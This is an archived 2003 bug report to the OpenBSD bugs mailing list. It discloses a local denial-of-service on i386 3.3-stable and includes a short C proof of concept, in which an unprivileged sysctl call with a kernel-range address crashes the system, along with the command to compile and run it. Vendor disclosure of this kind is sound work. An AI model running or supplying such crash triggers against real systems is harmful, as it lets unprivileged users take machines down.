[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

i386 local DoS with un-priv user

To: bugs_(_at_)_openbsd_(_dot_)_org
Subject: i386 local DoS with un-priv user
From: Sanitized <sanitized_(_at_)_bigfoot_(_dot_)_com>
Date: Thu, 20 Nov 2003 00:38:41 +0100
Cc: jose_(_at_)_monkey_(_dot_)_org
Reply-to: sanitized_(_at_)_bigfoot_(_dot_)_com

Hello,

Tested with 3.3-stable.

A low priv user, results in a system crash.

#include <stdio.h>
#include <sys/param.h>
#include <sys/sysctl.h>

int main ()
{
unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;

return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0));
}

Just:

$ cc problem.c -o problem && ./problem

I've not coded it, so don't give me credit.

Just fix it.

Thanks.

B.

Follow-Ups:
- Re: i386 local DoS with un-priv user
  - From: Dries Schellekens

Prev by Date: Re: compress bug fixes and changes
Next by Date: sendbug doesn't work for me
Previous by thread: bu,N0W - P0WERFU1 ANT1-AG1NG BRE@KTHR0UGH
Next by thread: Re: i386 local DoS with un-priv user
Index(es):
- Date
- Thread

Visit your host, monkey.org